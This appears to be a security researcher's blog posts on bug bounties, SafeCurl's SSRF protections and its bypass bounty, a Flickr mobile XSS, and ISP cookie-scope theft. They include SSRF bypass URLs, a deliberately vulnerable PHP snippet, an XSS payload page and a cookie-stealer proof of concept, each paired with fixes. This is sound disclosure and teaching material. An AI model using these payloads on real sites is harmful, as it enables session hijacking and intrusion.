Occasionally I’ll get an email from someone interested in getting involved in bug bounties. Whilst some people are quite protective about giving out information - nervous that more people participating leaves fewer bugs to find - I believe the more people involved the better. Getting paid for issues and gaining credibility is great, but the end goal should be to improve web security as a whole.

I thought it’d be useful to compile some of the information I give out (as opposed to typing it out each time), and some tips for people starting out. If you have anything to add, shoot me a message and I’ll update this page.

For anyone already working in web application security, this will probably be a bit too basic.

Bug Bounties

Bug bounties, also known as responsible disclosure programmes, are set up by companies to encourage people to report potential issues discovered on their sites. Some companies choose to reward researchers with money, swag, or an entry in their hall-of-fame. If you’re interested in web application security then they’re a great way of honing your skills, with the potential of earning some money and/or credibility at the same time.

Required Reading

There is one book that everyone recommends, and rightly so - The Web Application Hacker’s Handbook, which covers the majority of common web bugs, plus it uses Burp Suite in its examples.

The OWASP Top Ten has a high-level overview of the most common web application bugs.

Blogs

Quite a few people, me included, blog about issues they find. This is a great insight into the type of bugs that exist on sites, plus they’re always an interesting read. These are the ones I can remember off the top of my head.

Toolset

I’ll admit, I don’t use many tools - a lot of the time I’ll just write a quick PHP/Python script. I probably should, as it’d make my sessions more efficient, but these are the core ones I use all the time.

One thing to note is that automated scanners (such as Acunetix or Nikto) generate a lot of noise. Most programmes forbid the use of them for this reason. Plus you’re highly unlikely to find something with such a scanner that no one else has found.

  • Burp Suite - An intercepting proxy which lets you modify requests on the fly, replay requests and so on.
  • Nmap - Useful for finding additional web servers to investigate (providing the scope of the programme is wide enough)
  • DNS-Discovery - Find additional sub-domains to investigate

Intentionally Vulnerable Applications

Applications/systems which have vulnerabilities added to them are a fun way of testing out some techniques. You might find pages outputting user data without escaping (leading to XSS), or code which executes SQL queries in an insecure manner (leading to SQL Injection).
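As a rough illustration (hypothetical code, not taken from any particular practice application), the sort of thing you’ll be hunting for looks like this - unescaped output and string-built SQL, alongside the fixed versions:

    <?php
    // A deliberately vulnerable search page - the sort of code these practice
    // applications contain. $pdo is assumed to be an existing PDO connection.
    $q = $_GET['q'];

    // Reflected XSS: user input echoed without escaping.
    echo "You searched for: " . $q;

    // SQL injection: user input concatenated straight into the query.
    $rows = $pdo->query("SELECT * FROM posts WHERE title LIKE '%" . $q . "%'");

    // The fixed versions escape the output and bind the parameter instead.
    echo "You searched for: " . htmlspecialchars($q, ENT_QUOTES, 'UTF-8');
    $stmt = $pdo->prepare("SELECT * FROM posts WHERE title LIKE ?");
    $stmt->execute(array('%' . $q . '%'));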

Programmes

There are a lot of sites running a responsible disclosure programme now. The big ones are Facebook, Google, Yahoo and PayPal.

If you start looking for bugs on the above sites you might be looking for a good week or two without finding anything, since they’ve been around for a while. One option is to find a smaller site or a new bounty, which probably won’t have had as many people looking at it.

A good tip is to sign up for one of the many sites which host bounties on behalf of other companies. This lets you submit reports in a common format and track their progress - easier than emailing for updates.

Reporting

When submitting a bug, you need to realise that different companies have different time frames for triaging and patching issues. Combined with the volume of reports, you may have to wait a few days/a week for a response. If your first language isn’t English, then it might be wise to submit a short video demonstrating the issue.

Don’t be afraid to send in a report, but you’ll have to understand that the severity and impact that you think the bug has could be very different to how the security team views it. As time goes on, you’ll get a feel for what is an issue and what isn’t.

Facebook has compiled a list of the most common false-positives reported.

It’s been a week since I launched the SafeCurl “Capture the Bitcoins” contest, which has been a fun, but humbling event.

Whilst I work as a Security Engineer, and submitted my first bug bounty entry two years ago, I come from a development background. I’ve been writing PHP for coming up to nine years now, though nothing much in production for the past year and a half.

I wanted to take a break from searching for bugs, so decided to write some PHP (the language I surprisingly love). SafeCurl seemed like a great starting point - a useful package, not too large, and still involving web app security.

Once written, I launched the bounty - primarily to give it a thorough test, and partly because I wanted to see what it would be like receiving bug reports rather than submitting them.

In my head, I’d assumed that it would take ages for someone to bypass my code (if it happened at all). In reality, it took 2 hours. The reason being that I had rushed the project, excited to get it released as soon as possible. Further investigation should have been done at the start, which would have stopped such a silly bypass being possible.

Initially, there was going to be one 0.25 BTC bounty. However, if the prize was won before most people had seen the site, there would be less incentive to keep looking. So I refilled the wallet, and assumed this time no one would find a bypass.

I paid out another 0.1 BTC to two people who suggested a DNS rebinding attack might be possible. Whilst this was just a theory, I created a hot-fix to pin DNS in cURL.

Then came three more 0.25 BTC bounties, caused by inconsistencies between PHP’s URL parsing and the curl_exec function. After the first two were paid out, I declared the bounty over. However, the third was so similar to the previous two that it was only fair to pay out (from my personal wallet).

I’ve paid out 0.95 BTC more than I’d planned, and I don’t have infinite Bitcoins, but it was worth the money.

Bypasses

0.0.0.0

As I mentioned above, this was a stupid mistake. In the code, I’d blacklisted certain private ranges (127.0.0.1/32, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), but 0.0.0.0 could also be used to refer to localhost.

The solution was pretty simple - blacklist any reserved ranges.

Found by @zoczus.
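In sketch form, that check looks something like this (my own illustration rather than SafeCurl’s actual code) - reject any IP that falls inside a reserved or private IPv4 range, including 0.0.0.0/8:

    <?php
    // Returns true if the IPv4 address $ip falls inside the CIDR range $cidr.
    function ipInRange($ip, $cidr) {
        list($subnet, $bits) = explode('/', $cidr);
        $mask = -1 << (32 - (int) $bits);
        return (ip2long($ip) & $mask) === (ip2long($subnet) & $mask);
    }

    // Reserved/private ranges to blacklist - note that 0.0.0.0/8 is included.
    function isReservedIp($ip) {
        $reservedRanges = array(
            '0.0.0.0/8', '10.0.0.0/8', '127.0.0.0/8', '169.254.0.0/16',
            '172.16.0.0/12', '192.168.0.0/16',
        );
        foreach ($reservedRanges as $range) {
            if (ipInRange($ip, $range)) {
                return true;
            }
        }
        return false;
    }

    var_dump(isReservedIp('0.0.0.0')); // true - the bypass is now caught
    var_dump(isReservedIp('8.8.8.8')); // false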

DNS Rebinding

I was made aware that my code wasn’t safe from a DNS rebinding attack. This would involve rapidly switching the A record for the domain name from a valid IP (which passes any checks) to an internal IP. Whilst this was only theoretical - I played around with it but couldn’t get it to work - it was 1am and I didn’t want to risk leaving it unpatched whilst I was asleep.

Two separate people raised it at the same time. Whilst I could have just paid the first, I thought it’d be fair to pay both since they came up with it independently (the Facebook attitude).

To fix this, the IP returned from gethostbynamel is pinned by replacing the hostname in the URL with the IP, and passing the original hostname in the HTTP “Host” header.

Found by @47696d6569 and rynac.
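Roughly, the pinning works like this (a sketch of the approach, not SafeCurl’s exact code):

    <?php
    // Resolve the hostname once and pin the result, so the DNS answer can't
    // change between our validation and cURL's own lookup.
    $url  = 'http://safecurl.fin1te.net/';
    $host = parse_url($url, PHP_URL_HOST);

    $ips = gethostbynamel($host); // every A record for the host
    // ... validate each IP in $ips against the blacklist here ...

    // Swap the hostname for the validated IP, and send the original hostname
    // in the Host header so virtual hosting still works.
    $pinnedUrl = str_replace($host, $ips[0], $url);

    $ch = curl_init($pinnedUrl);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Host: ' . $host));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);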

URL parsing issue #1

This was an interesting one. Whilst the btc.txt file couldn’t be accessed, it did bypass all other checks of SafeCurl so was worthy of the bounty. Passing http://user:pass@safecurl.fin1te.net?@google.com to parse_url causes google.com to be returned (PHP sees pass@safecurl.fin1te.net? as the password). However, when the full URL is given to curl_exec, it sees safecurl.fin1te.net as the host, and @google.com/ as the query string. Pretty cool trick.

A quick solution for this was to disable the use of credentials in the URL. This worked, until the next bypass was found.

Found by @shDaniell.
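That hot-fix amounted to something like this (an illustrative sketch, not the actual patch):

    <?php
    function assertNoCredentials($url) {
        $parts = parse_url($url);
        if ($parts === false) {
            throw new Exception('Unable to parse URL: ' . $url);
        }
        // Reject any URL carrying a username or password, since the two
        // parsers can disagree about where the credentials end.
        if (isset($parts['user']) || isset($parts['pass'])) {
            throw new Exception('Credentials are not allowed in URLs');
        }
    }

    assertNoCredentials('http://user:pass@safecurl.fin1te.net?@google.com'); // throws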

URL parsing issue #2

Similar to the previous, passing http://validurl.com#user:pass@safecurl.fin1te.net causes parse_url to see validurl.com as the host, and user:pass@safecurl.fin1te.net as the fragment. Like before, curl_exec handles this differently and uses safecurl.fin1te.net.

This was patched by using rawurlencode on the username, password and fragment to prevent the URL getting parsed differently.

Found by Marcus T.
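In sketch form, the patch re-builds the URL from its parsed parts, percent-encoding the pieces that let the two parsers disagree (again, an illustration rather than the exact SafeCurl code):

    <?php
    function rebuildUrl(array $parts) {
        $url = $parts['scheme'] . '://';
        if (isset($parts['user'])) {
            $url .= rawurlencode($parts['user']);
            if (isset($parts['pass'])) {
                $url .= ':' . rawurlencode($parts['pass']);
            }
            $url .= '@';
        }
        $url .= $parts['host'];
        if (isset($parts['port'])) {
            $url .= ':' . $parts['port'];
        }
        $url .= isset($parts['path']) ? $parts['path'] : '/';
        if (isset($parts['query'])) {
            $url .= '?' . $parts['query'];
        }
        if (isset($parts['fragment'])) {
            $url .= '#' . rawurlencode($parts['fragment']);
        }
        return $url;
    }

    // The fragment can no longer smuggle a different host past the check.
    echo rebuildUrl(parse_url('http://validurl.com#user:pass@safecurl.fin1te.net'));
    // http://validurl.com/#user%3Apass%40safecurl.fin1te.net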

URL parsing issue #3

And the last one was again very similar. I didn’t URL encode the query string, so http://google.com?user:pass@safecurl.fin1te.net was used to bypass the check.

The path and query string are now URL encoded too, with certain characters (& = ; [ ]) left intact, else the receiving server may not parse it properly.

Found by @iDeniSix.
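Something along these lines (my sketch, not the exact implementation) - encode the query string, then restore the handful of delimiters the receiving server still needs:

    <?php
    // Percent-encode a query string, then put back "&", "=", ";", "[" and "]"
    // so the receiving server can still parse the parameters.
    function encodeQuery($query) {
        $encoded = rawurlencode($query);
        return str_replace(
            array('%26', '%3D', '%3B', '%5B', '%5D'),
            array('&', '=', ';', '[', ']'),
            $encoded
        );
    }

    // "user:pass@safecurl.fin1te.net" can no longer be mistaken for an authority.
    echo encodeQuery('user:pass@safecurl.fin1te.net');
    // user%3Apass%40safecurl.fin1te.net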

Lessons Learnt

Lesson #1 - Don’t Rush

The first issue, along with some typos, was caused by me rushing the project. These could have been prevented by taking it a bit slower, and by doing a proper design and investigation phase before starting development.

Lesson #2 - Bug Bounties are a Great Idea

Had I launched my code straight into production, without the ~1,000,000 attempts to bypass it, the issues above would not have been fixed, and vulnerable code would have been deployed.

There is a price to pay, namely the Bitcoins I paid out, but this is nothing compared to the cost of someone using it for malicious purposes.

Lesson #3 - Have Unit Tests, Get Code Reviews

This is something I’ve learnt from development in “real-life”. Unfortunately I didn’t apply this to my own project (partly because it was just me working on it, partly because of Lesson #1). Unit tests do seem a bit of a chore to write sometimes, but they can catch a lot of bugs being re-introduced in the codebase. Plus having someone look over your code from a different perspective is invaluable.
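For SafeCurl that means tests along these lines - a PHPUnit sketch in which the namespace, the execute() signature and the exception class are assumptions on my part, so check the project for the real API:

    <?php
    use fin1te\SafeCurl\SafeCurl;

    class SafeCurlTest extends \PHPUnit\Framework\TestCase
    {
        public function testKnownBadUrlsAreBlocked()
        {
            // URLs that should always be rejected: a blocked scheme, plus
            // hosts that resolve to reserved or private addresses.
            $blocked = array(
                'file:///etc/passwd',
                'http://0.0.0.0/btc.txt',
                'http://127.0.0.1/btc.txt',
                'http://10.0.0.1/',
            );

            foreach ($blocked as $url) {
                $threw = false;
                try {
                    SafeCurl::execute($url, curl_init());
                } catch (\Exception $e) {
                    $threw = true;
                }
                $this->assertTrue($threw, 'Expected ' . $url . ' to be blocked');
            }
        }
    }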

Lesson #4 - You’re Not as Good as You Think

This may sound like a horrible lesson, but it’s not. Having something “secure” you wrote be ripped to shreds is a really awesome thing. It makes you realise that there may be gaps in your knowledge, and you now know where they are, and how to fix them. I’m really excited to launch another for this exact reason.

Going Forward

SafeCurl version 2 will be released shortly. This will include real unit tests covering the code, and test cases for each of the bypasses (and any other techniques I can find). Plus, experimental IPv6 support will be added.

Another bounty will be launched at some point. Whether it’s a SafeCurl bounty, or another concept, I’ve not decided.

I will also be looking to port SafeCurl to other languages such as Java, Python, Ruby, etc. This will be more of a challenge, since my strongest skills lie with PHP. If anyone wants to help out drop me a message.

Statistics

A great part of the event was looking inside the Apache access logs to see some of the attempts people were making. I’ve included statistics, if you’re curious.

  • Total attempts: 1,140,803
  • Average attempts per person: 651
  • Average attempts per person (excluding top 10): 20

Server-Side Request Forgery attacks involve getting a target server to perform requests on our behalf. Rather than re-covering the great material already published, this post introduces a new PHP package designed to help prevent these sorts of attacks.

Protections

To protect our scripts from being abused in this way, we simply validate any URL or file path being passed to functions which can send requests. Of course, this is easier said than done.

The first step is to validate the provided scheme (and port if specified). This is to stop requests to PHP’s extra protocols (php://, phar://) which would let an attacker read files off of the file system.
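A minimal sketch of that first step, using the same defaults SafeCurl ships with (HTTP/HTTPS on ports 80, 443 and 8080):

    <?php
    function validateSchemeAndPort(array $parts) {
        $allowedSchemes = array('http', 'https');
        $allowedPorts   = array(80, 443, 8080);

        $scheme = isset($parts['scheme']) ? strtolower($parts['scheme']) : '';
        if (!in_array($scheme, $allowedSchemes, true)) {
            throw new Exception('Scheme not allowed: ' . $scheme);
        }
        if (isset($parts['port']) && !in_array((int) $parts['port'], $allowedPorts, true)) {
            throw new Exception('Port not allowed: ' . $parts['port']);
        }
    }

    validateSchemeAndPort(parse_url('php://filter/resource=/etc/passwd')); // throws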

The second is to validate the URL itself. This is to make sure that someone isn’t requesting a blacklisted domain (such as https://jira.fin1te.net), or a private/loopback IP (such as 127.0.0.1). You should also resolve any domain names to their IP addresses, and validate these too, so that someone can’t use a DNS entry pointing at an internal IP.
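Again in sketch form - check the hostname against a blacklist (the jira.fin1te.net pattern below is just the example above), then resolve it and check every returned address:

    <?php
    function validateHost($host) {
        // Blacklisted domains, expressed as regular expressions.
        $blacklistedDomains = array('#(^|\.)jira\.fin1te\.net$#i');
        foreach ($blacklistedDomains as $pattern) {
            if (preg_match($pattern, $host)) {
                throw new Exception('Domain is blacklisted: ' . $host);
            }
        }

        // Resolve the name and check every A record, so a DNS entry
        // pointing at an internal IP can't slip through.
        $ips = gethostbynamel($host);
        if ($ips === false) {
            throw new Exception('Unable to resolve host: ' . $host);
        }
        foreach ($ips as $ip) {
            $public = filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
            if ($public === false) {
                throw new Exception('Host resolves to a private/reserved IP: ' . $ip);
            }
        }
    }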

Lastly, any redirects which cURL would normally handle should be caught, and the URL specified in the Location header validated using the above steps.
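The redirect handling can be sketched like this: turn off cURL’s automatic following and re-validate the Location target of every hop yourself (validateUrl() below is a hypothetical stand-in for the checks above):

    <?php
    function safeFetch($url, $maxRedirects = 5) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); // we follow manually

        for ($i = 0; $i <= $maxRedirects; $i++) {
            validateUrl($url); // hypothetical: scheme, port, host and IP checks
            curl_setopt($ch, CURLOPT_URL, $url);
            $body = curl_exec($ch);

            $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            $next = curl_getinfo($ch, CURLINFO_REDIRECT_URL);
            if ($code < 300 || $code >= 400 || !$next) {
                return $body; // not a redirect - we're done
            }
            $url = $next;     // the Location target gets validated on the next pass
        }
        throw new Exception('Too many redirects');
    }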

Putting this all together, we get SafeCurl.

SafeCurl

SafeCurl has been designed to be a drop-in replacement for the curl_exec function in PHP. Whilst there are other functions in PHP which can be used to grab the contents of a URL (file_get_contents, fopen, include), curl_exec is the most popular. In future versions, support for other functions will be added.

To use SafeCurl, simply call the SafeCurl::execute method where you’d usually call curl_exec, wrapping everything in a try/catch block.
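A minimal usage sketch - the namespace and the curl-handle argument are my shorthand here, so check the Github project for the exact signature:

    <?php
    use fin1te\SafeCurl\SafeCurl;

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

    try {
        // Drop-in for curl_exec($ch): the URL is validated before any request is made.
        $response = SafeCurl::execute('http://www.example.com/', $ch);
    } catch (Exception $e) {
        // The URL failed validation, or the request itself failed.
        echo 'Blocked: ' . $e->getMessage();
    }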

By default, SafeCurl will only allow HTTP or HTTPS requests to ports 80, 443 and 8080, and only to hosts which don’t resolve to a private/loopback IP address.

If you wish to specify additional options, instantiate a new Options object and pass in your custom rules. Domains are accepted in regular expression format, and IPs in CIDR notation.
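The method names below are purely illustrative - I haven’t reproduced the Options API from memory, so treat this as the general shape and check the README for the real calls. It does show the rule formats mentioned above (domains as regular expressions, IPs in CIDR notation):

    <?php
    use fin1te\SafeCurl\SafeCurl;
    use fin1te\SafeCurl\Options;

    $options = new Options();
    // Hypothetical calls: blacklist a domain pattern and an IP range,
    // and whitelist an extra port.
    $options->addToList('blacklist', 'domain', '(.*)\.example\.com');
    $options->addToList('blacklist', 'ip', '8.8.8.0/24');
    $options->addToList('whitelist', 'port', '8443');

    $response = SafeCurl::execute('http://www.example.com/', curl_init(), $options);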

More usage information is available on the Github project. If you find any issues please raise them, or better yet, submit a pull request.

If you manage to find a way of bypassing it completely, then please participate in the bounty.

Bounty (Capture the Bitcoins)

In order to give SafeCurl a real-world test, I’ve hosted a demo site, which lets you try out the different protections.

The document root contains a Bitcoin private key, with 0.25BTC contained within. This file is only accessible from localhost, so if you do bypass it, grab the file and the Bitcoins are yours.

The source code for the site is also available, if you’re interested.

For more information see the Bounty page.

I recently found an XSS on the mobile version of Flickr (http://m.flickr.com). Due to the way the bug is triggered, I thought it deserved a write-up.

Whilst browsing the site, you’ll notice that pages are loaded via AJAX with the path stored in the URL fragment (not as common these days now that pushState is available).

When the page is loaded, a function, q(), is called which checks the value of location.hash and calls F.iphone.showSelectedPage().

In order to load pages from the current domain, it checks for a leading slash. If this isn’t present, it prepends one when calling the next function, F.iphone.showPageByHref().

This function then performs a regex check on the URL to ensure that it’ll only load links from m.flickr.com. If this check fails, and the URL starts with a double slash (a protocol-relative link), it prepends http://m.flickr.com. Pretty solid check, right?

In case you didn’t notice, the first regex isn’t anchored to the start of the string. This means we can bypass it provided our own URL contains m.flickr.com somewhere.
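To illustrate the difference (in PHP rather than Flickr’s JavaScript, and with patterns of my own rather than theirs):

    <?php
    $url = '//fin1te.net/flickr.php?bypass=m.flickr.com';

    // Unanchored: matches because "m.flickr.com" appears somewhere in the URL.
    var_dump((bool) preg_match('#m\.flickr\.com#', $url));              // true

    // Anchored to the start of the string: the bypass no longer matches.
    var_dump((bool) preg_match('#^(https?:)?//m\.flickr\.com#', $url)); // false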

We can get our own external page loaded by passing in a URL like so:

//fin1te.net/flickr.php?bypass=m.flickr.com

The code will check for a leading slash (we have two :)), which it’ll pass, then checks for the domain, which will also pass, then load it via AJAX.

Since modern browsers support CORS, the browser will first send an OPTIONS (preflight) request to the page, to check that it allows the cross-origin load, and then send the real request.

All we need to do is specify a couple of headers (the additional options in the Access-Control-Allow-Headers are to prevent syntax errors in the Javascript), along with our payload.
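The attacker-side flickr.php only needs to answer that preflight and then return markup for innerHTML. This is a reconstruction of the idea rather than the original proof-of-concept, and the exact header values are assumptions:

    <?php
    // Answer the CORS preflight so the cross-origin AJAX load is allowed.
    header('Access-Control-Allow-Origin: *');
    header('Access-Control-Allow-Methods: GET, OPTIONS');
    header('Access-Control-Allow-Headers: X-Requested-With, Content-Type');

    if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
        exit; // the preflight gets headers only, no body
    }

    // The response body is dropped into the page with innerHTML, so a script
    // tag won't execute - an onerror handler on an image will.
    echo '<img src="x" onerror="alert(document.domain)">';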

The next part of the Javascript dumps the response into an element with innerHTML.

Which leads to our payload being executed.

Fix

This issue is now fixed by anchoring the regex to the start of the string, and also running another regex to check if it starts with a double slash.

tl;dr: ISPs, please reduce your cookie scope.

Everyone now knows that hosting user generated content on a sub-domain is bad. Attacks have been demonstrated on sites such as GitHub, and it’s why Google uses googleusercontent.com.

But what if you’re an ISP? You might not host any user content; however, you probably assign customers an IP which has reverse DNS set. You’ll see hostnames like 1-1-1-1-ip-static.hfc.comcastbusiness.net or 2.2.2.2.threembb.co.uk.

This isn’t really an issue on its own. The issue is when the hostname assigned is a sub-domain of your own site. Combine that with cookies scoped to a loose domain (fairly common practice) and forward DNS (again, fairly common), and the result can be cookie stealing, and therefore account hijacking.

To pull this off, an attacker either needs to be a customer of the ISP they’re targeting, or have access to a machine of a customer (pretty easy with the use of botnets). A web server is then hosted on the connection, and referenced by the hostname assigned (as opposed to the IP).

Example

Rather than showing a real-world example - I’d rather keep the companies’ names private - I’ve set up a proof-of-concept.

We have a fake ISP hosted on fin1te-dsl.com, which mimics an ISPs portal. Registering an account and logging in generates a session cookie (try it out).

We also have a site (152-151-64-212.cust.dsl.fin1te-dsl.com) which in real life would be hosted on a user’s own connection. A page, 152-151-64-212.cust.dsl.fin1te-dsl.com/debug.php, is hosted to display the cookies back for debug purposes.

Now, we just need a user who has a session to submit a request to our own site and we can grab their cookies. Since we’re accessing the cookies via the HTTP request and not via Javascript, we can write a quick stealer which sets a Content-Type of image/jpeg, and embed the image on a page.
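The stealer itself is only a few lines - a sketch of the proof-of-concept’s debug/stealer page, with the file name and log path made up for the example:

    <?php
    // Hosted on 152-151-64-212.cust.dsl.fin1te-dsl.com - because the ISP's
    // session cookie is scoped to .fin1te-dsl.com, the browser sends it here too.
    $cookies = isset($_SERVER['HTTP_COOKIE']) ? $_SERVER['HTTP_COOKIE'] : '-';
    file_put_contents(
        '/var/log/stolen-cookies.log',
        date('c') . ' ' . $_SERVER['REMOTE_ADDR'] . ' ' . $cookies . "\n",
        FILE_APPEND
    );

    // Pretend to be an image, so the page embedding
    // <img src="http://152-151-64-212.cust.dsl.fin1te-dsl.com/steal.php">
    // loads silently.
    header('Content-Type: image/jpeg');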

And the cookies show up in the logs.

We just need to set our own cookie to this value and we’ve successfully hijacked their session.

Out of the four major UK ISPs I tested, two were vulnerable (now patched). If you assume an equal market share (based on 2012 estimates), that’s approximately 10.5 million users who can be potentially targeted. Of course, they have to be logged in - but you can always embed the cookie stealer as an image on a support forum, for example.

Mitigation Techniques

We have three mitigation options. The first is to remove super cookies and restrict the scope to a single domain. This may be impractical if you separate content onto different sub-domains. The second is to disable forward DNS for customers. And the third is to change the hostname assigned to one which isn’t a sub-domain.
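For the first option, the difference is just the domain argument when the cookie is set. Sketched with PHP’s setcookie() purely for illustration (the ISP’s portal may well not be PHP):

    <?php
    $sessionId = bin2hex(openssl_random_pseudo_bytes(16));

    // Host-only cookie: an empty domain argument means it is sent to
    // fin1te-dsl.com only, never to customer hostnames such as
    // 152-151-64-212.cust.dsl.fin1te-dsl.com.
    setcookie('session', $sessionId, 0, '/', '', false, true);

    // The loose scope that enables the attack looks like this instead:
    // setcookie('session', $sessionId, 0, '/', '.fin1te-dsl.com');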

In addition, techniques such as pinning a session to an IP address will help to an extent. Unless you store a CSRF token in a cookie, in which case, we can just CSRF the user.

Source

If you want to browse the source code of the proof-of-concept, it’s available on Github.

Note

Since I didn’t have the time to test every single ISP in the world (just the UK ones) for the three requirements that make them vulnerable, I decided to send an email to the security@ addresses at the top 25 ISPs - 20 of these bounced, and I received no reply from the other 5.

The two UK ones I originally contacted patched promptly and gave good updates, so kudos to you two.